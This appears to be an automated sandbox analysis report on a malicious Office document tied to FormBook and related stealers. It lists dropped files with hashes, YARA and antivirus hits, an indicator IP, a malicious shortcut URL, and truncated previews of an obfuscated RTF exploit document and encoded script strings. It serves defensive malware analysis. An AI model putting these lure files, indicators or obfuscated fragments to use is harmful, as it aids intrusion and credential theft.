7dcce5b76c8b17472d024758970a406b | PO-014842-2.xls | malicious | FormBook | 208.64.171.230
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Roaming\dagifhd | capcut Setup-x64.msi | malicious | RedLine
C:\Users\user\AppData\Roaming\dagifhd | 7YZlAbfKMg.rtf | malicious | AgentTesla
C:\Users\user\AppData\Roaming\dagifhd | Product Inquiry466789.xls | malicious | AgentTesla
C:\Users\user\AppData\Roaming\dagifhd | A24-00342B139336 #TW_Inquiry.xls | malicious | SmokeLoader
C:\Users\user\AppData\Roaming\dagifhd | LgTFM1JlJu.rtf | malicious | AgentTesla
C:\Users\user\AppData\Roaming\dagifhd | #20240627_Edlen_B.xls | malicious | SmokeLoader
C:\Users\user\AppData\Roaming\dagifhd | #20240627_Edlen_A.xls | malicious | SmokeLoader
C:\Users\user\AppData\Roaming\dagifhd | Requirements.xla.xlsx | malicious | AveMaria, UACMe
C:\Users\user\AppData\Roaming\dagifhd | vns.exe | malicious | AsyncRAT, VenomRAT
C:\Users\user\AppData\Roaming\dagifhd | Doc606112.xls | malicious | AgentTesla
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 131072
Entropy (8bit): 0.02560424029065332
Encrypted: false
SSDEEP: 6:I3DPcD3Ar9vxggLRWnGQ8kuRXv//4tfnRujlw//+GtluJ/eRuj:I3DPKAdyHGvYg3J/
MD5: 3D1B956F9FA3EC5031E267CB671773C9
SHA1: 99A31C241AE4B2E0F87E35E1FD1F09DBF270F8C3
SHA-256: 24DFC9C3EF8BCD182FD20A9054F42237CB04A70EEFE91F8D787036039C3D7C6B
SHA-512: C9FEFED8628A1B101445D0157A4080CF623D6738F7FEB46A17E8AC49F736CE0AE0A15F508D1BD0D96EB3D13709EB6CB9A0497D1E15217623795839BECEE9D3E5
Malicious: false
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 4760
Entropy (8bit): 4.834060479684549
Encrypted: false
SSDEEP: 96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
MD5: 838C1F472806CF4BA2A9EC49C27C2847
SHA1: D1C63579585C4740956B099697C74AD3E7C89751
SHA-256: 40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
SHA-512: E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
Malicious: false
                                                      Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):0.34726597513537405
                                                      Encrypted:false
                                                      SSDEEP:3:Nlll:Nll
                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                      Malicious:false
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:Rich Text Format data, version 1
                                                      Category:dropped
                                                      Size (bytes):102469
                                                      Entropy (8bit):2.582252060648168
                                                      Encrypted:false
                                                      SSDEEP:768:RnuaXplG+yhAWeLYLguPxUyxYxqY0WqhmRMw:RuTvhAWeLbuP6yiwY0WQmRMw
                                                      MD5:1131D758C8208AF277E943F04339E646
                                                      SHA1:030ADAC1ABC31AA8BC3A22DDA63C4A005AEE6E88
                                                      SHA-256:EB8381B156AAD734EF3A0328B4985ED1EDECA1C8D79D66E094598F8C6992AC71
                                                      SHA-512:31952FF007778891C6FE0E34931233E396EE3649C8E502FE35808F2322AFAFEEB89D102C3EB364E0C3C3BE1B84240A0375C58B4045A80AB2D838F0778DBBC5F0
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday[1].doc, Author: ditekSHen
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      Preview:{\rtf1.............{\*\levelnumbers180579240 \%}.{\28554852%;*6,[<?|*;@9?(?(80?.!$'@.@|*??=~-1?3371*7!<_.4#-,9(?.)..~_##;3?+.7,(~+<<?))!).1>#__5..<:.9'^~2=058%]:@4|+31).^;??.8%==9[+_8*1$^%-%7]@?-**5;+&($~?=%,<579;?`]@13>3;(6:$1)`2*?6@|<![972+!:1`?2<+4/~4;4.(.9&>^]&?520^?/(4.`.%.'%;3.?0<6@^5>%5|;,.8?*52*&>$?_8$._1>,^|)).6`<~?@'>?%~??>8<?243>9-|`.?$*966^'3+;-'5*.+=+<.4&808?7:|1.0.91!62^8*2[]?<#:.&:2.>%%5-8??%!%5.)+?3(9?.5[~2'`?]88?>?&8+[2'*|?4^/>?=>3[&%!|_./9[;'.#?|`+?@%606=#)4^?/`~9~,#1@=$$<&?.@.$?5%'1*[7,472?2!9.+^@0!?,>7324+<^3$.$^89%.,?#`.==2+/_&)`#:?.8(?;@4?>9_<8]1?)&0#.1&!?[@(_^:&)(+[!0%<:'.|``]0|.?;_?9.!>_1]?8%].(%7^.;.(+@?,!=]?'%#???4%2*?.??&5.]5&&~;#..%?@%=(()-%^%0|?__]3%]_7`)^+3(+%!%%.-]^).?>??=.)%=_*$:;?($%%91,*0$/<&[38$?|:=..6.!9.$6/.1+??%%-2<.#,%>![_?*>#@2;_67)/74|`??;&#1&6|,|1(9?3-36??%,2?`?8>@~*-27..4-&-0)1,&8..=528.=29>6?|8>^(?/@]+?!'<(@*#0)|)32;2[?[.*?*;?`4=#-:`4?.^0-?[1.*-8]'6_?5.7)%|&%.~%4?(,%];~](..|`6'1..,?!$.#@_%#``;.=~+'([?7_.*414,4/4?_5@208$?;`.??|?:2|.6!?!)9?*^??
                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):183084
                                                      Entropy (8bit):3.886576284833851
                                                      Encrypted:false
                                                      SSDEEP:3072:bYFoL2rQi6toiBDgt5p0Gwo9QjS7/DVRq9f1y9uuYaROM5e:0uqrh6BGqykae
                                                      MD5:5AC26F4D93962796DB9CD2E19B32B200
                                                      SHA1:9856C349AD2B408CDD23AA63A620F22FBDA87FA3
                                                      SHA-256:E3E7A3D0BA55B8DBBE3633B1DAD0A3BBF4EADA72DD8DF3F7B1BC76A692862F23
                                                      SHA-512:4C806A0A8FBA3FA9B24A0631D5A3E12F87E21AB3E45F44ECA8DE8C756F436B56E14D383A8B871BD5B5781624AC10E55F2FAD92DE02FA98E6FA53F57D6864B00A
                                                      Malicious:false
                                                      Preview:......a.O.L.h.K.f.L.q.J.U. .=. .".Z.n.f.L.W.m.C.c.G.n.".....U.z.p.u.L.N.N.f.K.k. .=. .".O.e.h.A.Q.W.U.x.L.L.".....L.c.g.O.G.K.m.K.c.L. .=. .".H.b.L.k.L.t.L.W.c.Q.".....v.c.U.s.f.l.Z.R.l.C. .=. .".m.L.u.b.S.T.k.K.W.h.".....k.O.G.G.J.A.l.U.e.f. .=. .".Z.R.f.K.z.W.L.Z.J.b.".....U.z.G.O.h.b.i.W.W.U. .=. .".Z.h.i.K.J.L.G.c.x.L.".....R.N.W.W.P.c.W.L.p.k. .=. .".i.n.L.c.R.a.L.O.R.T.".........L.J.R.H.p.W.O.L.i.A. .=. .".H.A.N.i.C.K.K.a.o.W.".....L.l.i.x.u.b.W.i.P.a. .=. .".e.C.P.x.b.Z.k.A.Q.c.".....c.a.W.i.l.m.i.U.Z.o. .=. .".P.O.b.f.c.P.W.t.m.W.".....p.b.n.Q.m.p.o.i.K.u. .=. .".Q.k.Z.A.v.l.I.x.c.J.".....P.q.i.G.N.O.k.W.u.S. .=. .".u.N.U.K.c.i.G.p.d.h.".....U.g.n.I.L.e.z.U.i.t. .=. .".I.W.G.c.L.u.h.W.H.k.".....o.a.k.C.e.o.A.L.z.i. .=. .".P.W.Z.Z.K.m.A.O.l.f.".....C.N.i.P.K.n.o.h.s.e. .=. .".N.G.U.q.L.d.i.z.G.W.".....P.c.K.P.T.W.k.e.Q.L. .=. .".s.h.N.H.b.z.k.W.T.W.".....L.N.G.L.t.A.H.i.d.G. .=. .".k.h.U.h.J.A.i.Z.P.W.".........P.c.Z.W.h.a.U.a.Q.s. .=. .".c.c.v.G.G.k.H.G.T.f.".....z.z.k.P.x.L.K.
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                      Category:dropped
                                                      Size (bytes):43984
                                                      Entropy (8bit):3.1310314493532707
                                                      Encrypted:false
                                                      SSDEEP:384:Tsx4kqsFO5/aQIjNQ0vizlZLgshxctB+6umKKGve+o23nCjqgujyP:TWpO5iHjGPz3LThiB+6DKKGvex23nCBP
                                                      MD5:046BAAA04967159FF30067EDCA6AF959
                                                      SHA1:F47ACCE08111E384C411B0B0973EDBF2795CEB74
                                                      SHA-256:C853F5F5958D6A90D8ED5C62898BC2635310F448F07AFEFAA10D24E21BBFBC0E
                                                      SHA-512:0D8F0D6216B2219358951E06C366FEAC200294630C4F7BC6041DC4BA5CBC93B7BBBE35CF27DC7E8941EEC28E21C8164CE80B2272ADF4C5CFBD85837EFDE1893D
                                                      Malicious:false
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                      Category:dropped
                                                      Size (bytes):6229368
                                                      Entropy (8bit):2.2428848517098547
                                                      Encrypted:false
                                                      SSDEEP:24576:meACi8BiJK+BIlNh67oJuoJhg1AutgNr+2:tbi8BiJK+By2oJuoJV
                                                      MD5:4528AD0C5AF3598AF2C354BFD8A0EBE1
                                                      SHA1:AA4C9E8FF7C78A604111F072FB6E19B094593031
                                                      SHA-256:F4A038BE121CD5C1A2E480501F031D0B81673B196108D12E50CBE08044A3B671
                                                      SHA-512:C464C1D6F2AD03814C4588AAB84AB1A105D6638EE4F45FDEDE04E588A85A7F94727FD44939C944279AFF5D15E30D475DCF004804E436AC64D7472C85B61D62E1
                                                      Malicious:false
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:Rich Text Format data, version 1
                                                      Category:dropped
                                                      Size (bytes):102469
                                                      Entropy (8bit):2.582252060648168
                                                      Encrypted:false
                                                      SSDEEP:768:RnuaXplG+yhAWeLYLguPxUyxYxqY0WqhmRMw:RuTvhAWeLbuP6yiwY0WQmRMw
                                                      MD5:1131D758C8208AF277E943F04339E646
                                                      SHA1:030ADAC1ABC31AA8BC3A22DDA63C4A005AEE6E88
                                                      SHA-256:EB8381B156AAD734EF3A0328B4985ED1EDECA1C8D79D66E094598F8C6992AC71
                                                      SHA-512:31952FF007778891C6FE0E34931233E396EE3649C8E502FE35808F2322AFAFEEB89D102C3EB364E0C3C3BE1B84240A0375C58B4045A80AB2D838F0778DBBC5F0
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EADD419E.doc, Author: ditekSHen
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      Preview:{\rtf1.............{\*\levelnumbers180579240 \%}.{\28554852%;*6,[<?|*;@9?(?(80?.!$'@.@|*??=~-1?3371*7!<_.4#-,9(?.)..~_##;3?+.7,(~+<<?))!).1>#__5..<:.9'^~2=058%]:@4|+31).^;??.8%==9[+_8*1$^%-%7]@?-**5;+&($~?=%,<579;?`]@13>3;(6:$1)`2*?6@|<![972+!:1`?2<+4/~4;4.(.9&>^]&?520^?/(4.`.%.'%;3.?0<6@^5>%5|;,.8?*52*&>$?_8$._1>,^|)).6`<~?@'>?%~??>8<?243>9-|`.?$*966^'3+;-'5*.+=+<.4&808?7:|1.0.91!62^8*2[]?<#:.&:2.>%%5-8??%!%5.)+?3(9?.5[~2'`?]88?>?&8+[2'*|?4^/>?=>3[&%!|_./9[;'.#?|`+?@%606=#)4^?/`~9~,#1@=$$<&?.@.$?5%'1*[7,472?2!9.+^@0!?,>7324+<^3$.$^89%.,?#`.==2+/_&)`#:?.8(?;@4?>9_<8]1?)&0#.1&!?[@(_^:&)(+[!0%<:'.|``]0|.?;_?9.!>_1]?8%].(%7^.;.(+@?,!=]?'%#???4%2*?.??&5.]5&&~;#..%?@%=(()-%^%0|?__]3%]_7`)^+3(+%!%%.-]^).?>??=.)%=_*$:;?($%%91,*0$/<&[38$?|:=..6.!9.$6/.1+??%%-2<.#,%>![_?*>#@2;_67)/74|`??;&#1&6|,|1(9?3-36??%,2?`?8>@~*-27..4-&-0)1,&8..=528.=29>6?|8>^(?/@]+?!'<(@*#0)|)32;2[?[.*?*;?`4=#-:`4?.^0-?[1.*-8]'6_?5.7)%|&%.~%4?(,%];~](..|`6'1..,?!$.#@_%#``;.=~+'([?7_.*414,4/4?_5@208$?;`.??|?:2|.6!?!)9?*^??
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                      Category:dropped
                                                      Size (bytes):32768
                                                      Entropy (8bit):1.6838296052120771
                                                      Encrypted:false
                                                      SSDEEP:96:LIpMPzZhl1NlHUwxx83jKimMP6Pnel1NlHUwxx83jKi:LBPzZRHUw4ewP6PnMHUw4e
                                                      MD5:4CC76557ED20CEE6A292CDC3AD3F28BE
                                                      SHA1:87F8C6BCDF8AD6F3587AFF1F1F2C2456324F8EB0
                                                      SHA-256:C0D642DE473D587F6E95C015DB09737E57656777FF86CB6631764731419D01C4
                                                      SHA-512:B8630D1CBAEAFC90738EF359D78FF3F1EB1B711CD83DB3EFBF257AA69B35EB0FEEABF05736BB2EAB0C7B86BD047753F3F81E0CBC64D8CA63F7BD43A5206DC438
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1024
                                                      Entropy (8bit):0.05390218305374581
                                                      Encrypted:false
                                                      SSDEEP:3:ol3lYdn:4Wn
                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                      Malicious:false
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):11264
                                                      Entropy (8bit):3.5496637746188817
                                                      Encrypted:false
                                                      SSDEEP:192:W0hkLlVEaY2KaQP1fQERQprctBmUgXBRJZA/D2MuwsL0nxjywfUemlEDolBMBIQp:/kZylraQP1oIQprctBmRBPe97xjywfOG
                                                      MD5:C42E774D567E93B5E18C2B2924F91E1C
                                                      SHA1:0995AFAB2B817F602BD468F5E3305DCF67856FD1
                                                      SHA-256:0A8B81DDD6CE6714E801B89A502E1BA21BD708227AB67F938DA4B3057480C7C4
                                                      SHA-512:4C5047360328E53DB58DB32294695EED75A4E9269C8CD001746598DAECA77293505651DF346D5E8AD09E363F661A220EEA3E865403630503DF66DB5DF2332DC0
                                                      Malicious:false
                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                                      Category:dropped
                                                      Size (bytes):40960
                                                      Entropy (8bit):0.7798653713156546
                                                      Encrypted:false
                                                      SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                      MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                                      SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                      SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                      SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                      Malicious:false
                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
                                                      Category:dropped
                                                      Size (bytes):20480
                                                      Entropy (8bit):1.3870145383915669
                                                      Encrypted:false
                                                      SSDEEP:48:TBLOpEO5J/Kd7UEvqckQaKgj5EZwx1wayEgd7kKK9LeYyBlIAO/tXK:hNw0CKaKfu1wai6LeYzN/9K
                                                      MD5:1623709C6B2FB813984B1265C26A85F1
                                                      SHA1:CCE4DDBE93E97E68359CB6FD71242F796A785F86
                                                      SHA-256:88BCF762A75F085ECD3B12EB2BA81B81A7F8C9CDDDD4DED624BA28566EB7EEAA
                                                      SHA-512:6D2E23E4E0D1D912AF3426129F7DE490F23326F6179EEC27AFE28C438CA37493AEA775E62755C76D6A8850DB6D6E70F0D0A8D396A35E869F4BF0F761CDD507D8
                                                      Malicious:false
                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                      Category:dropped
                                                      Size (bytes):77824
                                                      Entropy (8bit):1.133993246026424
                                                      Encrypted:false
                                                      SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                      MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                      SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                      SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                      SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                      Malicious:false
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):131072
                                                      Entropy (8bit):0.02552939605308332
                                                      Encrypted:false
                                                      SSDEEP:6:I3DPcVxzFvxggLRjub8wglJ5FRXv//4tfnRujlw//+GtluJ/eRuj:I3DPEVpP2alLvYg3J/
                                                      MD5:279E09C81B4FEC0CF240599FFF163B45
                                                      SHA1:55065B02426FA69BDF77F82DD91A908FA5FBB40F
                                                      SHA-256:7AFDBEFAFA96C10F77BC65686A4083CEAFF62A211BA0216384C7030C8F29B8DC
                                                      SHA-512:CD827EF02D04710569ED9231B7020565A4F7A77B0183B6AAB77FA9504BAD93FBD8C385F96CF294EFA28F279BDE016F30B810C2898149EA1715319C56CDE064D4
                                                      Malicious:false
                                                      Preview:......M.eFy...z..a...]M...I.k.;S,...X.F...Fa.q............................t...S..H.....-:.........C...d..O..w..{S.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):131072
                                                      Entropy (8bit):0.02560424029065332
                                                      Encrypted:false
                                                      SSDEEP:6:I3DPcD3Ar9vxggLRWnGQ8kuRXv//4tfnRujlw//+GtluJ/eRuj:I3DPKAdyHGvYg3J/
                                                      MD5:3D1B956F9FA3EC5031E267CB671773C9
                                                      SHA1:99A31C241AE4B2E0F87E35E1FD1F09DBF270F8C3
                                                      SHA-256:24DFC9C3EF8BCD182FD20A9054F42237CB04A70EEFE91F8D787036039C3D7C6B
                                                      SHA-512:C9FEFED8628A1B101445D0157A4080CF623D6738F7FEB46A17E8AC49F736CE0AE0A15F508D1BD0D96EB3D13709EB6CB9A0497D1E15217623795839BECEE9D3E5
                                                      Malicious:false
                                                      Preview:......M.eFy...z. .T=V.K...d..D&S,...X.F...Fa.q.............................d$t.fZI.;=................p.B.A]g'e.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):512
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                      Malicious:false
                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):16384
                                                      Entropy (8bit):0.8793237011532438
                                                      Encrypted:false
                                                      SSDEEP:48:mSpjgJPWirkjBaX5YKX+lxGu0FxguGFzg:m8jgJPWx6GqaxGukGuG9g
                                                      MD5:314C2D25DD5DB4329FC682BAD485361C
                                                      SHA1:B53C3BA2877091492A3F8E5A0742DE0D9F8C3283
                                                      SHA-256:7A8DC7A04939AC2D75C967DA6DE15A1CC79F727FEED26D74700A61CBF72A7447
                                                      SHA-512:42C2A496C8656C70E054B4AE532A20AC70128E37A643FB4336B3D37E8ACD68A5D3FFEE3CB6E906BF4DC7B48AA595BE570309C86FFF4714E79E4FB6F9F0E9D178
                                                      Malicious:false
                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):512
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                      Malicious:false
                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:MS Windows 95 Internet shortcut text (URL=<https://crash.sh/>), ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):43
                                                      Entropy (8bit):4.315231324217973
                                                      Encrypted:false
                                                      SSDEEP:3:HRAbABGQYm2fSQV:HRYFVm4Sy
                                                      MD5:1307D64401D7D605511C3FEB61577E11
                                                      SHA1:3F918D3F36C9F86517C56E5789F20000F2868127
                                                      SHA-256:A4009B753241124E9E177EA58A522D4233797C37BF1771F2847F8F295FACA3E0
                                                      SHA-512:0B6948C6604B101820F236AF8A564BAB4D80F7052BB52064E8C7F516416741A4823F60C6CC23478F81F05C4BDD759C2F2C60D99C2A23B0A0E3E895948AD6FB16
                                                      Malicious:true
                                                      Preview:[InternetShortcut]..URL=https://crash.sh/..
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:Generic INItialization configuration [xls]
                                                      Category:modified
                                                      Size (bytes):80
                                                      Entropy (8bit):4.51688274496351
                                                      Encrypted:false
                                                      SSDEEP:3:bDmnS9QumVC3WV/ULUmMJVdS/ULUv:byS9iX/UKJ3S/UC
                                                      MD5:F922B992DABD7E84B550457255F8B4E6
                                                      SHA1:1DCFD20AD261AED65C0814D5E738B6D976DA5BEB
                                                      SHA-256:527D3F0AE5123F12308FEE2097FA532231917BC42A3BDDD18A7D470FB19CB1D7
                                                      SHA-512:8099A0DCF9478DFB510E91930CBCBDE040E2FA3867D1774B588EE3F87F1A7DA9A6511AB7FA94A6B67A66BA541B365ECFFE614A9D566BF445161113DF64E1B213
                                                      Malicious:false
                                                      Preview:[folders]..udMVqm.url=0..crash.sh.url=0..40830001.LNK=0..[xls]..40830001.LNK=0..
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
